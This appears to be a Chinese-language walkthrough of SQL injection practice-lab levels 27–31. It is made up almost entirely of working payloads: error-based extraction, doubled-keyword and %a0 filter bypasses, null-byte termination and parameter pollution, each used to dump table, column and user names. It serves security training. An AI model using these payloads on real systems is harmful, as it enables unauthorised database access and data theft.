27.

过滤了union和select 使用双写绕过

有报错信息使用报错注入

1'and(extractvalue(1,concat(0x5c,database())))and'1'='1
1'and(updatexml(1,concat(0x7e,database(),0x7e),1))and'1'='1

1'and(extractvalue(1,concat(0x5c,(selseselectlectect(group_concat(table_name))from(information_schema.tables)where(table_schema='security')))))and'1'='1
1'and(updatexml(1,concat(0x7e,(seselselectectlect(group_concat(table_name))from(information_schema.tables)where(table_schema='security')),0x7e),1))and'1'='1

1'and(extractvalue(1,concat(0x5c,(seselselectectlect(group_concat(column_name))from(information_schema.columns)where(table_schema='security')and(table_name='users')))))and'1'='1
1'and(updatexml(1,concat(0x7e,(seselselectectlect(group_concat(column_name))from(information_schema.columns)where(table_schema='security')and(table_name='users')),0x7e),1))and'1'='1

1'and(extractvalue(1,concat(0x5c,(seselselectectlect(group_concat(username))from(security.users)))))and'1'='1
1'and(updatexml(1,concat(0x7e,(seselselectectlect(group_concat(username))from(security.users)),0x7e),1))and'1'='1

这里显示不了所有的数据可以使用limit

27a.

没报错信息了

‘不能闭合尝试“发现”可以闭合

0"ununionion%a0seselselectectlect%a01,2,3%a0and"1"="1

0"ununionion%a0seselselectectlect%a01,database(),3%a0and"1"="1

0"ununionion%a0seselselectectlect%a01,(seselselectectlect%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema='security'),3%a0and"1"="1

0"ununionion%a0seselselectectlect%a01,(seselselectectlect%a0group_concat(column_name)%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0and%a0table_name='users'),3%a0and"1"="1

0"ununionion%a0seselselectectlect%a01,(seselselectectlect%a0group_concat(username)%a0from%a0security.users),3%a0and"1"="1

28.

不会返回报错信息无法使用报错注入

1')union%a0select%a01,2,3;%00

0')union%a0select%a01,database(),3;%00

0')union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema='security'),3;%00

0')union%a0select%a01,(select%a0group_concat(column_name)%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0and%a0table_name='users'),3;%00

0')union%a0select%a01,(select%a0group_concat(username)%a0from%a0security.users),3;%00

28a.

0')union%a0select 1,2,3;%00

0')union%a0select 1,database(),3;%00

0')union%a0select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3;%00

0')union%a0select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3;%00

0')union%a0select 1,(select group_concat(username) from security.users),3;%00

29.

题目显示会检测输入的参数是不是数字类型，在sql语句中接收相同的参数时会使用后面的值

这里传递两个id

&id=0'union select 1,database(),3 --+

&id=0'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

&id=0'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+

&id=0'union select 1,(select group_concat(username) from security.users),3 --+

30.

单引号换成双引号

&id=0"union select 1,2,3 --+

&id=0"union select 1,database(),3 --+

&id=0"union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

&id=0"union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+

&id=0"union select 1,(select group_concat(username) from security.users),3 --+

31.

&id=0")union select 1,2,3 --+

多了个括号

&id=0")union select 1,database(),3--+

&id=0")union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

&id=0")union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+

&id=0")union select 1,(select group_concat(username) from security.users),3--+